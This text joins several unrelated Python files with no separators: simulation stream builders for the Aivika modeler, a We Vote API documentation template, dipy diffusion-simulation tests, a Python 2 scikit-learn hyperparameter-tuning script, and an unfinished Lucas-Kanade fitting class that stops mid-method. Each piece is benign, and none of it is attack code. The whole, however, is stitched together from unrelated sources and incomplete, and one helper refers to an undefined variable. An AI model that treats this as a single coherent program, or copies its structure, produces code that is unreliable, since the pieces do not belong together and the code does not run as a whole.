# Copyright (c) 2017 David Sorokin <david.sorokin@gmail.com>
#
# Licensed under BSD3. See the LICENSE.txt file in the root of this distribution.

from simulation.aivika.modeler.model import *
from simulation.aivika.modeler.port import *
from simulation.aivika.modeler.stream import *
from simulation.aivika.modeler.data_type import *
from simulation.aivika.modeler.pdf import *

def uniform_random_stream(transact_type, min_delay, max_delay):
    """Return a new stream of transacts with random delays distributed uniformly."""
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomUniformStream ' + str(min_delay) + ' ' + str(max_delay)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def uniform_int_random_stream(transact_type, min_delay, max_delay):
    """Return a new stream of transacts with integer random delays distributed uniformly."""
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomUniformIntStream ' + str(min_delay) + ' ' + str(max_delay)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def triangular_random_stream(transact_type, min_delay, median_delay, max_delay):
    """Return a new stream of transacts with random delays having the triangular distribution."""
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomTriangularStream ' + str(min_delay) + ' ' +  str(median_delay) + ' ' + str(max_delay)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def normal_random_stream(transact_type, mean_delay, delay_deviation):
    """Return a new stream of transacts with random delays having the normal distribution."""
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomNormalStream ' + str(mean_delay) + ' ' + str(delay_deviation)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def lognormal_random_stream(transact_type, normal_mean_delay, normal_delay_deviation):
    """Return a new stream of transacts with random delays having the lognormal distribution.

       The numerical parameters are related to the normal distribution that
       this distribution is derived from.
    """
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomLogNormalStream ' + str(normal_mean_delay) + ' ' + str(normal_delay_deviation)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def exponential_random_stream(transact_type, mean_delay):
    """Return a new stream of transacts with random delays having the exponential distribution with the specified mean (a reciprocal of the rate)."""
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomExponentialStream ' + str(mean_delay)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def erlang_random_stream(transact_type, scale, shape):
    """Return a new stream of transacts with random delays having the Erlang distribution with the specified scale (a reciprocal of the rate) and shape parameters."""
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomErlangStream ' + str(scale) + ' ' + str(shape)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def poisson_random_stream(transact_type, mean_delay):
    """Return a new stream of transacts with random delays having the Poisson distribution with the specified mean."""
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomPoissonStream ' + str(mean_delay)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def binomial_random_stream(transact_type, probability, trials):
    """Return a new stream of transacts with random delays having the binomial distribution with the specified probability and trials."""
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomBinomialStream ' + str(probability) + ' ' + str(trials)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def gamma_random_stream(transact_type, shape, scale):
    """Return a new stream of transacts with random delays having the Gamma distribution by the specified shape and scale."""
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomGammaStream ' + str(shape) + ' ' + str(scale)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def beta_random_stream(transact_type, alpha, beta):
    """Return a new stream of transacts with random delays having the Beta distribution by the specified shape parameters (alpha and beta)."""
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomBetaStream ' + str(alpha) + ' ' + str(beta)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def weibull_random_stream(transact_type, shape, scale):
    """Return a new stream of transacts with random delays having the Weibull distribution by the specified shape and scale."""
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomWeibullStream ' + str(shape) + ' ' + str(scale)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

def discrete_random_stream(transact_type, pdf):
    """Return a new stream of transacts with random delays having the discrete distribution by the specified probability density function."""
    expect_transact_type(transact_type)
    model = transact_type.get_model()
    code = 'return $ mapStream (\\a -> ' + transact_type.coerce_arrival('a') + ') $ '
    code += 'randomDiscreteStream ' + encode_pdf(pdf)
    y = StreamPort(model, transact_type.get_data_type())
    y.bind_to_input()
    y.write(code)
    return y

# apis_v1/documentation_source/voter_star_on_save_doc.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-


def voter_star_on_save_doc_template_values(url_root):
    """
    Show documentation about voterStarOnSave
    """
    required_query_parameter_list = [
        {
            'name':         'api_key',
            'value':        'string (from post, cookie, or get (in that order))',  # boolean, integer, long, string
            'description':  'The unique key provided to any organization using the WeVoteServer APIs',
        },
        {
            'name':         'voter_device_id',
            'value':        'string',  # boolean, integer, long, string
            'description':  'An 88 character unique identifier linked to a voter record on the server',
        },
        {
            'name':         'kind_of_ballot_item',
            'value':        'string',  # boolean, integer, long, string
            'description':  'What is the type of ballot item for which we are saving the \'on\' status? '
                            '(kind_of_ballot_item is either "OFFICE", "CANDIDATE", "POLITICIAN" or "MEASURE")',
        },
        {
            'name':         'ballot_item_id',
            'value':        'integer',  # boolean, integer, long, string
            'description':  'The unique internal identifier for this ballot_item '
                            '(either ballot_item_id OR ballot_item_we_vote_id required -- not both. '
                            'If it exists, ballot_item_id is used instead of ballot_item_we_vote_id)',
        },
        {
            'name':         'ballot_item_we_vote_id',
            'value':        'string',  # boolean, integer, long, string
            'description':  'The unique identifier for this ballot_item across all networks '
                            '(either ballot_item_id OR ballot_item_we_vote_id required -- not both. '
                            'NOTE: In the future we might support other identifiers used in the industry.',
        },
    ]
    optional_query_parameter_list = [
    ]

    potential_status_codes_list = [
        {
            'code':         'VALID_VOTER_DEVICE_ID_MISSING',
            'description':  'Cannot proceed. A valid voter_device_id parameter was not included.',
        },
        {
            'code':         'VALID_VOTER_ID_MISSING',
            'description':  'Cannot proceed. Missing voter_id while trying to save.',
        },
        {
            'code':         'STAR_ON_OFFICE CREATE/UPDATE ITEM_STARRED',
            'description':  '',
        },
        {
            'code':         'STAR_ON_CANDIDATE CREATE/UPDATE ITEM_STARRED',
            'description':  '',
        },
        {
            'code':         'STAR_ON_MEASURE CREATE/UPDATE ITEM_STARRED',
            'description':  '',
        },
    ]

    try_now_link_variables_dict = {
        'kind_of_ballot_item': 'CANDIDATE',
        'ballot_item_id': '5655',
    }

    api_response = '{\n' \
                   '  "status": string (description of what happened),\n' \
                   '  "success": boolean (did the save happen?),\n' \
                   '  "ballot_item_id": integer,\n' \
                   '  "ballot_item_we_vote_id": string,\n' \
                   '  "kind_of_ballot_item": string (CANDIDATE, MEASURE),\n' \
                   '}'

    template_values = {
        'api_name': 'voterStarOnSave',
        'api_slug': 'voterStarOnSave',
        'api_introduction':
            "Save or create private 'star on' state for the current voter for a measure, an office or candidate.",
        'try_now_link': 'apis_v1:voterStarOnSaveView',
        'try_now_link_variables_dict': try_now_link_variables_dict,
        'url_root': url_root,
        'get_or_post': 'GET',
        'required_query_parameter_list': required_query_parameter_list,
        'optional_query_parameter_list': optional_query_parameter_list,
        'api_response': api_response,
        'api_response_notes':
            "",
        'potential_status_codes_list': potential_status_codes_list,
    }
    return template_values

import numpy as np

from nose.tools import (assert_true, assert_false, assert_equal,
                        assert_almost_equal)
from numpy.testing import (assert_array_equal, assert_array_almost_equal,
                           assert_)

from dipy.sims.voxel import (_check_directions, SingleTensor, MultiTensor,
                             multi_tensor_odf, all_tensor_evecs, add_noise,
                             single_tensor, sticks_and_ball, multi_tensor_dki,
                             kurtosis_element, DKI_signal)
from dipy.core.geometry import (vec2vec_rotmat, sphere2cart)
from dipy.data import get_data, get_sphere
from dipy.core.gradients import gradient_table
from dipy.io.gradients import read_bvals_bvecs


fimg, fbvals, fbvecs = get_data('small_64D')
bvals, bvecs = read_bvals_bvecs(fbvals, fbvecs)
gtab = gradient_table(bvals, bvecs)

# 2 shells for techniques that requires multishell data
bvals_2s = np.concatenate((bvals, bvals * 2), axis=0)
bvecs_2s = np.concatenate((bvecs, bvecs), axis=0)
gtab_2s = gradient_table(bvals_2s, bvecs_2s)


def diff2eigenvectors(dx, dy, dz):
    """ numerical derivatives 2 eigenvectors
    """
    u = np.array([dx, dy, dz])
    u = u / np.linalg.norm(u)
    R = vec2vec_rotmat(basis[:, 0], u)
    eig0 = u
    eig1 = np.dot(R, basis[:, 1])
    eig2 = np.dot(R, basis[:, 2])
    eigs = np.zeros((3, 3))
    eigs[:, 0] = eig0
    eigs[:, 1] = eig1
    eigs[:, 2] = eig2
    return eigs, R


def test_check_directions():
    # Testing spherical angles for two principal coordinate axis
    angles = [(0, 0)]  # axis z
    sticks = _check_directions(angles)
    assert_array_almost_equal(sticks, [[0, 0, 1]])
    angles = [(0, 90)]  # axis z again (phi can be anything it theta is zero)
    sticks = _check_directions(angles)
    assert_array_almost_equal(sticks, [[0, 0, 1]])
    angles = [(90, 0)]  # axis x
    sticks = _check_directions(angles)
    assert_array_almost_equal(sticks, [[1, 0, 0]])
    # Testing if directions are already given in cartesian coordinates
    angles = [(0, 0, 1)]
    sticks = _check_directions(angles)
    assert_array_almost_equal(sticks, [[0, 0, 1]])
    # Testing more than one direction simultaneously
    angles = np.array([[90, 0], [30, 0]])
    sticks = _check_directions(angles)
    ref_vec = [np.sin(np.pi*30/180), 0, np.cos(np.pi*30/180)]
    assert_array_almost_equal(sticks, [[1, 0, 0], ref_vec])
    # Testing directions not aligned to planes x = 0, y = 0, or z = 0
    the1 = 0
    phi1 = 90
    the2 = 30
    phi2 = 45
    angles = np.array([(the1, phi1), (the2, phi2)])
    sticks = _check_directions(angles)
    ref_vec1 = (np.sin(np.pi*the1/180) * np.cos(np.pi*phi1/180),
                np.sin(np.pi*the1/180) * np.sin(np.pi*phi1/180),
                np.cos(np.pi*the1/180))
    ref_vec2 = (np.sin(np.pi*the2/180) * np.cos(np.pi*phi2/180),
                np.sin(np.pi*the2/180) * np.sin(np.pi*phi2/180),
                np.cos(np.pi*the2/180))
    assert_array_almost_equal(sticks, [ref_vec1, ref_vec2])


def test_sticks_and_ball():
    d = 0.0015
    S, sticks = sticks_and_ball(gtab, d=d, S0=1, angles=[(0, 0), ],
                                fractions=[100], snr=None)
    assert_array_equal(sticks, [[0, 0, 1]])
    S_st = SingleTensor(gtab, 1, evals=[d, 0, 0], evecs=[[0, 0, 0],
                                                         [0, 0, 0],
                                                         [1, 0, 0]])
    assert_array_almost_equal(S, S_st)


def test_single_tensor():
    evals = np.array([1.4, .35, .35]) * 10 ** (-3)
    evecs = np.eye(3)
    S = SingleTensor(gtab, 100, evals, evecs, snr=None)
    assert_array_almost_equal(S[gtab.b0s_mask], 100)
    assert_(np.mean(S[~gtab.b0s_mask]) < 100)

    from dipy.reconst.dti import TensorModel
    m = TensorModel(gtab)
    t = m.fit(S)

    assert_array_almost_equal(t.fa, 0.707, decimal=3)


def test_multi_tensor():
    sphere = get_sphere('symmetric724')
    vertices = sphere.vertices
    mevals = np.array(([0.0015, 0.0003, 0.0003],
                       [0.0015, 0.0003, 0.0003]))
    e0 = np.array([np.sqrt(2) / 2., np.sqrt(2) / 2., 0])
    e1 = np.array([0, np.sqrt(2) / 2., np.sqrt(2) / 2.])
    mevecs = [all_tensor_evecs(e0), all_tensor_evecs(e1)]
    # odf = multi_tensor_odf(vertices, [0.5, 0.5], mevals, mevecs)
    # assert_(odf.shape == (len(vertices),))
    # assert_(np.all(odf <= 1) & np.all(odf >= 0))

    fimg, fbvals, fbvecs = get_data('small_101D')
    bvals, bvecs = read_bvals_bvecs(fbvals, fbvecs)
    gtab = gradient_table(bvals, bvecs)

    s1 = single_tensor(gtab, 100, mevals[0], mevecs[0], snr=None)
    s2 = single_tensor(gtab, 100, mevals[1], mevecs[1], snr=None)

    Ssingle = 0.5*s1 + 0.5*s2

    S, sticks = MultiTensor(gtab, mevals, S0=100, angles=[(90, 45), (45, 90)],
                            fractions=[50, 50], snr=None)

    assert_array_almost_equal(S, Ssingle)


def test_snr():
    np.random.seed(1978)

    s = single_tensor(gtab)

    # For reasonably large SNR, var(signal) ~= sigma**2, where sigma = 1/SNR
    for snr in [5, 10, 20]:
        sigma = 1.0 / snr
        for j in range(1000):
            s_noise = add_noise(s, snr, 1, noise_type='rician')

        assert_array_almost_equal(np.var(s_noise - s), sigma ** 2, decimal=2)


def test_all_tensor_evecs():
    e0 = np.array([1/np.sqrt(2), 1/np.sqrt(2), 0])

    desired = np.array([[1/np.sqrt(2), 1/np.sqrt(2), 0],
                        [-1/np.sqrt(2), 1/np.sqrt(2), 0],
                        [0, 0, 1]]).T

    assert_array_almost_equal(all_tensor_evecs(e0), desired)


def test_kurtosis_elements():
    """ Testing symmetry of the elements of the KT

    As an 4th order tensor, KT has 81 elements. However, due to diffusion
    symmetry the KT is fully characterized by 15 independent elements. This
    test checks for this property.
    """
    # two fiber not aligned to planes x = 0, y = 0, or z = 0
    mevals = np.array([[0.00099, 0, 0], [0.00226, 0.00087, 0.00087],
                       [0.00099, 0, 0], [0.00226, 0.00087, 0.00087]])
    angles = [(80, 10), (80, 10), (20, 30), (20, 30)]
    fie = 0.49  # intra axonal water fraction
    frac = [fie * 50, (1-fie) * 50, fie * 50, (1-fie) * 50]
    sticks = _check_directions(angles)
    mD = np.zeros((len(frac), 3, 3))
    for i in range(len(frac)):
        R = all_tensor_evecs(sticks[i])
        mD[i] = np.dot(np.dot(R, np.diag(mevals[i])), R.T)

    # compute global DT
    D = np.zeros((3, 3))
    for i in range(len(frac)):
        D = D + frac[i]*mD[i]

    # compute voxel's MD
    MD = (D[0][0] + D[1][1] + D[2][2]) / 3

    # Reference dictionary with the 15 independent elements.
    # Note: The multiplication of the indexes (i+1) * (j+1) * (k+1) * (l+1)
    # for of an elements is only equal to this multiplication for another
    # element if an only if the element corresponds to an symmetry element.
    # Thus indexes multiplication is used as key of the reference dictionary
    kt_ref = {1: kurtosis_element(mD, frac, 0, 0, 0, 0),
              16: kurtosis_element(mD, frac, 1, 1, 1, 1),
              81: kurtosis_element(mD, frac, 2, 2, 2, 2),
              2: kurtosis_element(mD, frac, 0, 0, 0, 1),
              3: kurtosis_element(mD, frac, 0, 0, 0, 2),
              8: kurtosis_element(mD, frac, 0, 1, 1, 1),
              24: kurtosis_element(mD, frac, 1, 1, 1, 2),
              27: kurtosis_element(mD, frac, 0, 2, 2, 2),
              54: kurtosis_element(mD, frac, 1, 2, 2, 2),
              4: kurtosis_element(mD, frac, 0, 0, 1, 1),
              9: kurtosis_element(mD, frac, 0, 0, 2, 2),
              36: kurtosis_element(mD, frac, 1, 1, 2, 2),
              6: kurtosis_element(mD, frac, 0, 0, 1, 2),
              12: kurtosis_element(mD, frac, 0, 1, 1, 2),
              18: kurtosis_element(mD, frac, 0, 1, 2, 2)}

    # Testing all 81 possible elements
    xyz = [0, 1, 2]
    for i in xyz:
        for j in xyz:
            for k in xyz:
                for l in xyz:
                    key = (i+1) * (j+1) * (k+1) * (l+1)
                    assert_almost_equal(kurtosis_element(mD, frac, i, k, j, l),
                                        kt_ref[key])
                    # Testing optional funtion inputs
                    assert_almost_equal(kurtosis_element(mD, frac, i, k, j, l),
                                        kurtosis_element(mD, frac, i, k, j, l,
                                                         D, MD))


def test_DKI_simulations_aligned_fibers():
    """
    Testing DKI simulations when aligning the same fiber to different axis.

    If biological parameters don't change, kt[0] of a fiber aligned to axis x
    has to be equal to kt[1] of a fiber aligned to the axis y and equal to
    kt[2] of a fiber aligned to axis z. The same is applicable for dt
    """
    # Defining parameters based on Neto Henriques et al., 2015. NeuroImage 111
    mevals = np.array([[0.00099, 0, 0],               # Intra-cellular
                       [0.00226, 0.00087, 0.00087]])  # Extra-cellular
    frac = [49, 51]  # Compartment volume fraction
    # axis x
    angles = [(90, 0), (90, 0)]
    signal_fx, dt_fx, kt_fx = multi_tensor_dki(gtab_2s, mevals, angles=angles,
                                               fractions=frac)
    # axis y
    angles = [(90, 90), (90, 90)]
    signal_fy, dt_fy, kt_fy = multi_tensor_dki(gtab_2s, mevals, angles=angles,
                                               fractions=frac)
    # axis z
    angles = [(0, 0), (0, 0)]
    signal_fz, dt_fz, kt_fz = multi_tensor_dki(gtab_2s, mevals, angles=angles,
                                               fractions=frac)

    assert_array_equal([kt_fx[0], kt_fx[1], kt_fx[2]],
                       [kt_fy[1], kt_fy[0], kt_fy[2]])
    assert_array_equal([kt_fx[0], kt_fx[1], kt_fx[2]],
                       [kt_fz[2], kt_fz[0], kt_fz[1]])

    assert_array_equal([dt_fx[0], dt_fx[2], dt_fx[5]],
                       [dt_fy[2], dt_fy[0], dt_fy[5]])
    assert_array_equal([dt_fx[0], dt_fx[2], dt_fx[5]],
                       [dt_fz[5], dt_fz[0], dt_fz[2]])

    # testing S signal along axis x, y and z
    bvals = np.array([0, 0, 0, 1000, 1000, 1000, 2000, 2000, 2000])
    bvecs = np.asarray([[1, 0, 0], [0, 1, 0], [0, 0, 1],
                        [1, 0, 0], [0, 1, 0], [0, 0, 1],
                        [1, 0, 0], [0, 1, 0], [0, 0, 1]])
    gtab_axis = gradient_table(bvals, bvecs)
    # axis x
    S_fx = DKI_signal(gtab_axis, dt_fx, kt_fx, S0=100)
    assert_array_almost_equal(S_fx[0:3], [100, 100, 100])  # test S f0r b=0
    # axis y
    S_fy = DKI_signal(gtab_axis, dt_fy, kt_fy, S0=100)
    assert_array_almost_equal(S_fy[0:3], [100, 100, 100])  # test S f0r b=0
    # axis z
    S_fz = DKI_signal(gtab_axis, dt_fz, kt_fz, S0=100)
    assert_array_almost_equal(S_fz[0:3], [100, 100, 100])  # test S f0r b=0

    # test S for b = 1000
    assert_array_almost_equal([S_fx[3], S_fx[4], S_fx[5]],
                              [S_fy[4], S_fy[3], S_fy[5]])
    assert_array_almost_equal([S_fx[3], S_fx[4], S_fx[5]],
                              [S_fz[5], S_fz[3], S_fz[4]])
    # test S for b = 2000
    assert_array_almost_equal([S_fx[6], S_fx[7], S_fx[8]],
                              [S_fy[7], S_fy[6], S_fy[8]])
    assert_array_almost_equal([S_fx[6], S_fx[7], S_fx[8]],
                              [S_fz[8], S_fz[6], S_fz[7]])


def test_DKI_crossing_fibers_simulations():
    """ Testing DKI simulations of a crossing fiber
    """
    # two fiber not aligned to planes x = 0, y = 0, or z = 0
    mevals = np.array([[0.00099, 0, 0], [0.00226, 0.00087, 0.00087],
                       [0.00099, 0, 0], [0.00226, 0.00087, 0.00087]])
    angles = [(80, 10), (80, 10), (20, 30), (20, 30)]
    fie = 0.49
    frac = [fie*50, (1 - fie)*50, fie*50, (1 - fie)*50]
    signal, dt, kt = multi_tensor_dki(gtab_2s, mevals, angles=angles,
                                      fractions=frac, snr=None)
    # in this simulations dt and kt cannot have zero elements
    for i in range(len(dt)):
        assert dt[i] != 0
    for i in range(len(kt)):
        assert kt[i] != 0

    # test S, dt and kt relative to the expected values computed from another
    # DKI package - UDKI (Neto Henriques et al., 2015)
    dt_ref = [1.0576161e-3, 0.1292542e-3, 0.4786179e-3,
              0.2667081e-3, 0.1136643e-3, 0.9888660e-3]
    kt_ref = [2.3529944, 0.8226448, 2.3011221, 0.2017312, -0.0437535,
              0.0404011, 0.0355281, 0.2449859, 0.2157668, 0.3495910,
              0.0413366, 0.3461519, -0.0537046, 0.0133414, -0.017441]
    assert_array_almost_equal(dt, dt_ref)
    assert_array_almost_equal(kt, kt_ref)
    assert_array_almost_equal(signal,
                              DKI_signal(gtab_2s, dt_ref, kt_ref, S0=100,
                                         snr=None),
                              decimal=5)


if __name__ == "__main__":

    test_multi_tensor()

# License: BSD 3 clause <https://opensource.org/licenses/BSD-3-Clause>
# Copyright (c) 2016, Fabricio Vargas Matos <fabriciovargasmatos@gmail.com>
# All rights reserved.

''''
Tune the 3 most promissing algorithms and compare them
'''

# Load libraries
import os
import time
import pandas
import numpy
import matplotlib.pyplot as plt
from pandas.tools.plotting import scatter_matrix
from pandas import DataFrame
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import MinMaxScaler
from sklearn import cross_validation
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.pipeline import Pipeline
from sklearn.grid_search import GridSearchCV
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.datasets import load_digits
from sklearn.model_selection import GridSearchCV
from sklearn.decomposition import PCA, NMF
from sklearn.feature_selection import SelectKBest, chi2

import lib.eda1 as eda1
import lib.eda3 as eda3


#constants
N_DIGITS = 3
NUM_FOLDS = 10
RAND_SEED = 7
SCORING = 'accuracy'
VALIDATION_SIZE = 0.20
N_JOBS = 6

#global variables
start = time.clock()
imageidx = 1
createImages = True
results = []
names = []
params = []
bestResults = []

# RandomForestClassifier
def tuneRF(X_train, Y_train, outputPath):
    global results, names, params, bestResults
    
    print 'tune LR (Random Forest Classifier)'
    
    pipeline = Pipeline([('PCA', PCA()),('MinMaxScaler', MinMaxScaler(feature_range=(0, 1))),('Scaler', StandardScaler())])
    scaler = pipeline.fit(X_train)
    rescaledX = scaler.transform(X_train)

    #tune para meters
    # http://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html
    #n_estimators_values = [5, 10, 100, 1000, 3000]
    n_estimators_values = [1000]
    max_features_values = [0.1, 'auto', 'sqrt', 'log2', None] # (float)0.1=>10%
    criterion_values = ['gini', 'entropy']
    
    param_grid = dict(n_estimators=n_estimators_values, max_features=max_features_values, criterion=criterion_values)
    
    model = RandomForestClassifier()
    
    kfold = cross_validation.KFold(n=len(X_train), n_folds=NUM_FOLDS, random_state=RAND_SEED)
    grid = GridSearchCV(n_jobs=N_JOBS, verbose=10, estimator=model, param_grid=param_grid, scoring=SCORING, cv=kfold)
    
    grid_result = grid.fit(rescaledX, Y_train)
    print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))    
        
    best_idx = grid_result.best_index_

    #TODO: check it out if 'mean_test_score' is really what I want here
    cv_results = grid_result.cv_results_['mean_test_score']
    results.append(cv_results)
    
    grid_scores = sorted(grid_result.grid_scores_, key=lambda x: x[2].mean(), reverse=True)
    first = True
    for param, mean_score, scores in grid_scores:
        if first:
            bestResults.append({'name':'RF', 'mean':scores.mean(), 'std':scores.std(), 'params':param})
            first = False
        print("%f (%f) with: %r" % (scores.mean(), scores.std(), param))

# ExtraTreesClassifier
def tuneET(X_train, Y_train, outputPath):
    global results, names, params, bestResults
    
    print 'tune ET (Extra Trees Classifier)'
    
    pipeline = Pipeline([('PCA', PCA()),('MinMaxScaler', MinMaxScaler(feature_range=(0, 1))),('Scaler', StandardScaler())])
    scaler = pipeline.fit(X_train)
    rescaledX = scaler.transform(X_train)
    
    #tune para meters
    # http://scikit-learn.org/stable/modules/generated/sklearn.ensemble.ExtraTreesClassifier.html
    #n_estimators_values = [5, 10, 100, 1000, 3000]
    n_estimators_values = [1000]
    max_features_values = [0.1, 'auto', 'sqrt', 'log2', None] # (float)0.1=>10%
    criterion_values = ['gini', 'entropy']
    
    param_grid = dict(n_estimators=n_estimators_values, max_features=max_features_values, criterion=criterion_values)
    
    model = ExtraTreesClassifier()
    
    kfold = cross_validation.KFold(n=len(X_train), n_folds=NUM_FOLDS, random_state=RAND_SEED)
    grid = GridSearchCV(n_jobs=N_JOBS, verbose=10, estimator=model, param_grid=param_grid, scoring=SCORING, cv=kfold)
    
    grid_result = grid.fit(rescaledX, Y_train)
    print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))    
        
    best_idx = grid_result.best_index_

    #TODO: check it out if 'mean_test_score' is really what a want here
    cv_results = grid_result.cv_results_['mean_test_score']
    results.append(cv_results)
    
    grid_scores = sorted(grid_result.grid_scores_, key=lambda x: x[2].mean(), reverse=True)
    first = True
    for param, mean_score, scores in grid_scores:
        if first:
            bestResults.append({'name':'ET', 'mean':scores.mean(), 'std':scores.std(), 'params':param})
            first = False
        print("%f (%f) with: %r" % (scores.mean(), scores.std(), param))
    
    
# Tune scaled SVM
def tuneSVM(X_train, Y_train, outputPath):
    global results, names, params, bestResults
    
    print 'tune SVM (Support Vector Machines Classifier)'

    pipeline = Pipeline([('PCA', PCA()),('MinMaxScaler', MinMaxScaler(feature_range=(0, 1))),('Scaler', StandardScaler())])
    scaler = pipeline.fit(X_train)
    rescaledX = scaler.transform(X_train)
    
    #c_values = [0.1, 1.0, 100.0, 10000.0, 100000.0]
    c_values = [10000.0, 100000.0]
    kernel_values = ['linear', 'poly', 'rbf', 'sigmoid']
    param_grid = dict(C=c_values, kernel=kernel_values)
    
    model = SVC()
    
    kfold = cross_validation.KFold(n=len(X_train), n_folds=NUM_FOLDS, random_state=RAND_SEED)
    grid = GridSearchCV(n_jobs=N_JOBS, verbose=10, estimator=model, param_grid=param_grid, scoring=SCORING, cv=kfold)
    
    grid_result = grid.fit(rescaledX, Y_train)
    print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))    
        
    best_idx = grid_result.best_index_

    #TODO: check it out if 'mean_test_score' is really what a want here
    cv_results = grid_result.cv_results_['mean_test_score']
    results.append(cv_results)
    
    grid_scores = sorted(grid_result.grid_scores_, key=lambda x: x[2].mean(), reverse=True)
    first = True
    for param, mean_score, scores in grid_scores:
        if first:
            bestResults.append({'name':'SVM', 'mean':scores.mean(), 'std':scores.std(), 'params':param})
            first = False
        print("%f (%f) with: %r" % (scores.mean(), scores.std(), param))
        
        
def drawTunedAlgorithmsComparison(results, names, outputPath):
    global imageidx
    print '\n === Tuned Algorithms Comparison ===\n'

    #print bestResults
    for x in bestResults:
        print x
            
    # Compare Algorithms
    if (createImages):
        fig = plt.figure()
        fig.suptitle('Final Tuned-Algorithms Comparison')
        ax = fig.add_subplot(111)
        plt.boxplot(results)
        ax.set_xticklabels(names)
        #plt.show()
        plt.savefig(outputPath + str(imageidx).zfill(N_DIGITS) + '-Tuned-Algorithm-Comparison.png')
        imageidx += 1
    
    plt.close('all')
        
        
def set_createImages(value):
    global createImages
    createImages = value
    
        
# ===================================================
# ================== main function ==================
# ===================================================
def run(inputFilePath, outputPath, createImagesFlag, dropColumns):
    global start

    print '####################################################################'
    print '############### Running Exploratory Data Analysis #4 ###############'
    print '####################################################################'
    print ''
    
    set_createImages(createImagesFlag)
    start = time.clock()
    eda1.reset_imageidx()
    eda1.set_createImages(createImagesFlag)

    if not os.path.exists(outputPath):
        os.makedirs(outputPath)    
        
    # Load dataset
    dataframe = eda1.loadDataframe(inputFilePath)
    
    # drop out 'not fair' features
    dataframe = eda1.dataCleansing(dataframe, dropColumns)
            
    #Split-out train/validation dataset
    X_train, X_validation, Y_train, Y_validation = eda1.splitoutValidationDataset(dataframe)    

    '''
    # tune each algorithm
    try:
        tuneRF(X_train, Y_train, outputPath)
    except Exception as e:
        print "ERROR: couldn't tune RF"
        print "Message: %s" % str(e)
        
    try:
        tuneET(X_train, Y_train, outputPath)
    except Exception as e:
        print "ERROR: couldn't tune ET"
        print "Message: %s" % str(e)
    '''  
        
    try:
        tuneSVM(X_train, Y_train, outputPath)
    except Exception as e:
        print "ERROR: couldn't tune SVM"
        print "Message: %s" % str(e)
    
    #print the results comparing the algorithms with the best tune for each one
    drawTunedAlgorithmsComparison(results, names, outputPath)
    
    print '\n<<< THEN END - Running Exploratory Data Analysis #4 >>>'
    
    #RF - Best: 0.853451 using {'max_features': 'log2', 'n_estimators': 1000, 'criterion': 'gini'}
    #ET - Best: 0.855320 using {'max_features': None, 'n_estimators': 1000, 'criterion': 'gini'}
import numpy as np
from scipy.linalg import norm

from .base import AppearanceLucasKanade


class SimultaneousForwardAdditive(AppearanceLucasKanade):

    @property
    def algorithm(self):
        return 'Simultaneous-FA'

    def _fit(self, lk_fitting, max_iters=20, project=True):
        # Initial error > eps
        error = self.eps + 1
        image = lk_fitting.image
        lk_fitting.weights = []
        n_iters = 0

        # Number of shape weights
